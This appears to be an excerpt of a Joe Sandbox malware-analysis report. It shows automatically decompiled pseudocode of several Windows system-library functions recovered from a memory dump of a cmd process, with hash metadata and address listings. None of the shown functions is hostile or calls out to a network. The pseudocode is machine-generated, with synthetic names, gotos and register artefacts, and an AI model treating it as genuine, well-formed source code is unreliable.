                                                                                                                                          0x03bd52e9
                                                                                                                                          0x03bd52e9
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd52e9
                                                                                                                                          0x03bd530e
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4bc4013ace0ee6238a211a428d3815fe56edfb7daa420e0347198058a080fa70
                                                                                                                                          • Instruction ID: d9a7223cd4d586a0a4a6af21e5a740cbafd0b76cbc3782f52ab4092f384cbd89
                                                                                                                                          • Opcode Fuzzy Hash: 4bc4013ace0ee6238a211a428d3815fe56edfb7daa420e0347198058a080fa70
                                                                                                                                          • Instruction Fuzzy Hash: D651CE75205342AFC721EF28C841B27BBE8FF45718F1409AEE496DB651E770E884DB92
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C02AE4 Relevance: .2, Instructions: 159COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C02AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3cc8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3cc8208; // 0x3cc8207
				_t8 = _t57 + 0x3cc8208; // 0x3cc8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3cc8450; // 0x3475bbc
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x3cc821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3cc6d5c; // 0x7f550654
							_t72 =  *0x3cc6d5c; // 0x7f550654
							_t75 =  *0x3cc6d5c; // 0x7f550654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3cc6d5c; // 0x7f550654
							_t84 =  *0x3cc6d5c; // 0x7f550654
							_t87 =  *0x3cc6d5c; // 0x7f550654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E03C1F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                                                                          0x03c02ae4
                                                                                                                                          0x03c02aec
                                                                                                                                          0x03c02aef
                                                                                                                                          0x03c02af4
                                                                                                                                          0x03c02af7
                                                                                                                                          0x03c02afd
                                                                                                                                          0x03c02b92
                                                                                                                                          0x03c02b92
                                                                                                                                          0x03c02b97
                                                                                                                                          0x03c02b9c
                                                                                                                                          0x03c02b9c
                                                                                                                                          0x03c02b03
                                                                                                                                          0x03c02b06
                                                                                                                                          0x03c02b09
                                                                                                                                          0x03c02b09
                                                                                                                                          0x03c02b0f
                                                                                                                                          0x03c02b15
                                                                                                                                          0x03c02b15
                                                                                                                                          0x03c02b1b
                                                                                                                                          0x03c02b1e
                                                                                                                                          0x03c02b21
                                                                                                                                          0x03c02b26
                                                                                                                                          0x03c02b29
                                                                                                                                          0x03c02b81
                                                                                                                                          0x03c02b84
                                                                                                                                          0x03c02c0e
                                                                                                                                          0x03c02c15
                                                                                                                                          0x03c02c24
                                                                                                                                          0x03c02c24
                                                                                                                                          0x03c02b8a
                                                                                                                                          0x03c02b8a
                                                                                                                                          0x03c02b8a
                                                                                                                                          0x03c02b8a
                                                                                                                                          0x03c02b90
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02b4a
                                                                                                                                          0x03c02b4a
                                                                                                                                          0x03c02b4d
                                                                                                                                          0x03c02b53
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02b55
                                                                                                                                          0x03c02b58
                                                                                                                                          0x03c02bb7
                                                                                                                                          0x03c45d1b
                                                                                                                                          0x03c45d37
                                                                                                                                          0x03c45d47
                                                                                                                                          0x03c45d53
                                                                                                                                          0x03c02bbd
                                                                                                                                          0x03c02bbd
                                                                                                                                          0x03c02bbd
                                                                                                                                          0x03c02bb7
                                                                                                                                          0x03c02b5d
                                                                                                                                          0x03c02c2f
                                                                                                                                          0x03c45d5b
                                                                                                                                          0x03c45d77
                                                                                                                                          0x03c45d87
                                                                                                                                          0x03c45d93
                                                                                                                                          0x03c02c35
                                                                                                                                          0x03c02c35
                                                                                                                                          0x03c02c35
                                                                                                                                          0x03c02c2f
                                                                                                                                          0x03c02b65
                                                                                                                                          0x03c02b9f
                                                                                                                                          0x03c02ba2
                                                                                                                                          0x03c02b67
                                                                                                                                          0x03c02b67
                                                                                                                                          0x03c02b69
                                                                                                                                          0x03c02b6b
                                                                                                                                          0x03c02b6e
                                                                                                                                          0x03c02bc9
                                                                                                                                          0x03c02bcc
                                                                                                                                          0x03c02bcf
                                                                                                                                          0x03c02bd4
                                                                                                                                          0x03c02bd6
                                                                                                                                          0x03c02bd6
                                                                                                                                          0x03c02bdb
                                                                                                                                          0x03c02c02
                                                                                                                                          0x03c02c05
                                                                                                                                          0x03c02c07
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02c07
                                                                                                                                          0x03c02be0
                                                                                                                                          0x03c02c00
                                                                                                                                          0x03c02c3f
                                                                                                                                          0x03c02c3f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02c00
                                                                                                                                          0x03c02be5
                                                                                                                                          0x03c02be7
                                                                                                                                          0x03c02bec
                                                                                                                                          0x03c02bf4
                                                                                                                                          0x03c02bf6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02bf6
                                                                                                                                          0x03c02b70
                                                                                                                                          0x03c02b76
                                                                                                                                          0x03c02b2b
                                                                                                                                          0x03c02b2b
                                                                                                                                          0x03c02b2d
                                                                                                                                          0x03c02b2f
                                                                                                                                          0x03c02b32
                                                                                                                                          0x03c02b35
                                                                                                                                          0x03c02b3a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02b40
                                                                                                                                          0x03c02b43
                                                                                                                                          0x03c02b45
                                                                                                                                          0x03c02b47
                                                                                                                                          0x03c02b4a
                                                                                                                                          0x03c02b4d
                                                                                                                                          0x03c02b53
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02b53
                                                                                                                                          0x03c02b78
                                                                                                                                          0x03c02b78
                                                                                                                                          0x03c02b7b
                                                                                                                                          0x03c02b7e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02b7e
                                                                                                                                          0x03c02b76
                                                                                                                                          0x03c02ba5
                                                                                                                                          0x03c02ba5
                                                                                                                                          0x03c02ba8
                                                                                                                                          0x03c02bad
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02baf
                                                                                                                                          0x03c02baf
                                                                                                                                          0x03c02bc2
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 02be7b4e796483705103c8a2c8e4ae76756659e37701696477a61bf7a890b86b
                                                                                                                                          • Instruction ID: 677a9a6193e0880f1e33e9de59798c72ebc20d968ce6dfdb86456b44c5f1f244
                                                                                                                                          • Opcode Fuzzy Hash: 02be7b4e796483705103c8a2c8e4ae76756659e37701696477a61bf7a890b86b
                                                                                                                                          • Instruction Fuzzy Hash: 8851E176E00165CFCB14DF1DC8989BEB7B5FB88700719895AE846EB394DB30AE51CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9AE44 Relevance: .2, Instructions: 152COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                          			E03C9AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E03C9C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E03C9ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E03C9FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E03C9EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E03BF7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E03C91608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E03CA1536(0x3cc8ae4, (_t74 -  *0x3cc8b04 >> 0x14) + (_t74 -  *0x3cc8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L03C9C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E03C9A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E03C7CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E03C9ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                                                                                          0x03c9ae44
                                                                                                                                          0x03c9ae4c
                                                                                                                                          0x03c9ae53
                                                                                                                                          0x03c9ae55
                                                                                                                                          0x03c9ae5c
                                                                                                                                          0x03c9ae64
                                                                                                                                          0x03c9ae68
                                                                                                                                          0x03c9ae75
                                                                                                                                          0x03c9ae75
                                                                                                                                          0x03c9ae78
                                                                                                                                          0x03c9ae7a
                                                                                                                                          0x03c9ae7c
                                                                                                                                          0x03c9ae7f
                                                                                                                                          0x03c9aea8
                                                                                                                                          0x03c9aeab
                                                                                                                                          0x03c9aead
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9aeb3
                                                                                                                                          0x03c9aeb8
                                                                                                                                          0x03c9aebb
                                                                                                                                          0x03c9aebd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9ae81
                                                                                                                                          0x03c9ae88
                                                                                                                                          0x03c9ae8f
                                                                                                                                          0x03c9ae9b
                                                                                                                                          0x03c9ae96
                                                                                                                                          0x03c9ae96
                                                                                                                                          0x03c9ae96
                                                                                                                                          0x03c9aea0
                                                                                                                                          0x03c9aea3
                                                                                                                                          0x03c9aebf
                                                                                                                                          0x03c9aebf
                                                                                                                                          0x03c9aec3
                                                                                                                                          0x03c9aec9
                                                                                                                                          0x03c9af0d
                                                                                                                                          0x03c9af14
                                                                                                                                          0x03c9af3d
                                                                                                                                          0x03c9af3d
                                                                                                                                          0x03c9af41
                                                                                                                                          0x03c9af44
                                                                                                                                          0x03c9af67
                                                                                                                                          0x03c9af67
                                                                                                                                          0x03c9af6a
                                                                                                                                          0x03c9afca
                                                                                                                                          0x03c9afd1
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9afd1
                                                                                                                                          0x03c9af6c
                                                                                                                                          0x03c9af6d
                                                                                                                                          0x03c9af75
                                                                                                                                          0x03c9af7c
                                                                                                                                          0x03c9af7e
                                                                                                                                          0x03c9af80
                                                                                                                                          0x03c9af85
                                                                                                                                          0x03c9af87
                                                                                                                                          0x03c9af99
                                                                                                                                          0x03c9af89
                                                                                                                                          0x03c9af92
                                                                                                                                          0x03c9af92
                                                                                                                                          0x03c9af9e
                                                                                                                                          0x03c9afa1
                                                                                                                                          0x03c9afa3
                                                                                                                                          0x03c9afa9
                                                                                                                                          0x03c9afb0
                                                                                                                                          0x03c9afb2
                                                                                                                                          0x03c9afb4
                                                                                                                                          0x03c9afbc
                                                                                                                                          0x03c9afbc
                                                                                                                                          0x03c9afb4
                                                                                                                                          0x03c9afb0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9afa1
                                                                                                                                          0x03c9af4f
                                                                                                                                          0x03c9af57
                                                                                                                                          0x03c9af5c
                                                                                                                                          0x03c9af5e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9af60
                                                                                                                                          0x03c9af64
                                                                                                                                          0x03c9af64
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9af64
                                                                                                                                          0x03c9af1a
                                                                                                                                          0x03c9af25
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9af27
                                                                                                                                          0x03c9af28
                                                                                                                                          0x03c9af33
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9aed0
                                                                                                                                          0x03c9aed0
                                                                                                                                          0x03c9aed2
                                                                                                                                          0x03c9aee1
                                                                                                                                          0x03c9aee4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9aee6
                                                                                                                                          0x03c9aeec
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9aefb
                                                                                                                                          0x03c9af07
                                                                                                                                          0x03c9afd3
                                                                                                                                          0x03c9afdb
                                                                                                                                          0x03c9afdb
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9af07
                                                                                                                                          0x03c9aed6
                                                                                                                                          0x03c9aed8
                                                                                                                                          0x03c9aedf
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9aedf
                                                                                                                                          0x03c9aec9

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e4856c75706ae0b88eee334f2d9dc1fed665425199a27524aaf6cbfaeb406427
                                                                                                                                          • Instruction ID: fd4cbfc22e789e412201663bb05b63116024c0493b790e4e240d5e19fdc8984d
                                                                                                                                          • Opcode Fuzzy Hash: e4856c75706ae0b88eee334f2d9dc1fed665425199a27524aaf6cbfaeb406427
                                                                                                                                          • Instruction Fuzzy Hash: 3B41C5B97007119BEF25DA26CC9CB7BB399EF84650F0B421AF816CF690DB34D911D690
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BFDBE9 Relevance: .1, Instructions: 149COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                          			E03BFDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E03BDCC50(E03BD4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03BF7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03CA8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03BF2280(_t58, _v44);
						E03BFDD82(_v44, _t102, _t98);
						E03BFB944(_t102, _v5);
						return E03BEFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3cc8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x3cc862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3cc8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x3cc862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x3c9fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                                                                          0x03bfdbe9
                                                                                                                                          0x03bfdbf2
                                                                                                                                          0x03bfdbf7
                                                                                                                                          0x03bfdbf9
                                                                                                                                          0x03bfdbfc
                                                                                                                                          0x03bfdc00
                                                                                                                                          0x03bfdc03
                                                                                                                                          0x03bfdc14
                                                                                                                                          0x03bfdd54
                                                                                                                                          0x03bfdd54
                                                                                                                                          0x03bfdd54
                                                                                                                                          0x03bfdc18
                                                                                                                                          0x03bfdc1d
                                                                                                                                          0x03bfdc1d
                                                                                                                                          0x03bfdc32
                                                                                                                                          0x03bfdc3b
                                                                                                                                          0x03bfdc3e
                                                                                                                                          0x03bfdc46
                                                                                                                                          0x03bfdd5b
                                                                                                                                          0x03bfdd62
                                                                                                                                          0x03bfdd64
                                                                                                                                          0x03bfdd67
                                                                                                                                          0x03bfdd69
                                                                                                                                          0x03bfdd6b
                                                                                                                                          0x03bfdd6e
                                                                                                                                          0x03bfdd70
                                                                                                                                          0x03bfdd73
                                                                                                                                          0x03bfdd73
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfdc4c
                                                                                                                                          0x03bfdc4e
                                                                                                                                          0x03c43ae3
                                                                                                                                          0x03c43ae8
                                                                                                                                          0x03c43aea
                                                                                                                                          0x03bfdce7
                                                                                                                                          0x03bfdce9
                                                                                                                                          0x03bfdcec
                                                                                                                                          0x03bfdcee
                                                                                                                                          0x03bfdcf0
                                                                                                                                          0x03bfdcf3
                                                                                                                                          0x03bfdcf5
                                                                                                                                          0x03c43af2
                                                                                                                                          0x03c43af5
                                                                                                                                          0x03c43af5
                                                                                                                                          0x03bfdd06
                                                                                                                                          0x03bfdd08
                                                                                                                                          0x03bfdd0b
                                                                                                                                          0x03bfdd12
                                                                                                                                          0x03c43b08
                                                                                                                                          0x03bfdd18
                                                                                                                                          0x03bfdd18
                                                                                                                                          0x03bfdd18
                                                                                                                                          0x03bfdd20
                                                                                                                                          0x03bfdd23
                                                                                                                                          0x03c43b16
                                                                                                                                          0x03c43b16
                                                                                                                                          0x03bfdd29
                                                                                                                                          0x03bfdd2d
                                                                                                                                          0x03bfdd36
                                                                                                                                          0x03bfdd40
                                                                                                                                          0x03bfdd51
                                                                                                                                          0x03bfdd51
                                                                                                                                          0x03bfdc54
                                                                                                                                          0x03bfdc59
                                                                                                                                          0x03bfdc59
                                                                                                                                          0x03bfdc5e
                                                                                                                                          0x03bfdc5e
                                                                                                                                          0x03bfdc63
                                                                                                                                          0x03bfdc66
                                                                                                                                          0x03bfdc6b
                                                                                                                                          0x03bfdc78
                                                                                                                                          0x03bfdc7b
                                                                                                                                          0x03bfdc81
                                                                                                                                          0x03bfdc81
                                                                                                                                          0x03bfdc83
                                                                                                                                          0x03bfdc89
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfdd7b
                                                                                                                                          0x03bfdd7b
                                                                                                                                          0x03bfdc8f
                                                                                                                                          0x03bfdc8f
                                                                                                                                          0x03bfdc92
                                                                                                                                          0x03bfdc99
                                                                                                                                          0x03bfdc9f
                                                                                                                                          0x03bfdca5
                                                                                                                                          0x03bfdcaa
                                                                                                                                          0x03bfdcaa
                                                                                                                                          0x03bfdcb3
                                                                                                                                          0x03bfdcb8
                                                                                                                                          0x03bfdcbb
                                                                                                                                          0x03bfdcc1
                                                                                                                                          0x03bfdccf
                                                                                                                                          0x03bfdcd2
                                                                                                                                          0x03bfdcd5
                                                                                                                                          0x03bfdcd7
                                                                                                                                          0x03bfdcda
                                                                                                                                          0x03bfdcdc
                                                                                                                                          0x03bfdcdc
                                                                                                                                          0x03bfdce2
                                                                                                                                          0x03bfdce4
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfdce4

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a12f552e9158f55f91c4a04644856d6c398ddf5c257eebda9ede7b935ed575e1
                                                                                                                                          • Instruction ID: 554ac00ae651559daadb1c5be6c22db52143f69557cca357073c85a730f72052
                                                                                                                                          • Opcode Fuzzy Hash: a12f552e9158f55f91c4a04644856d6c398ddf5c257eebda9ede7b935ed575e1
                                                                                                                                          • Instruction Fuzzy Hash: 9B519E79A01205DFCB14CF68C48069EFBF5BF48318F2591A9D655EB348DB30A948CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BEEF40 Relevance: .1, Instructions: 147COMMON
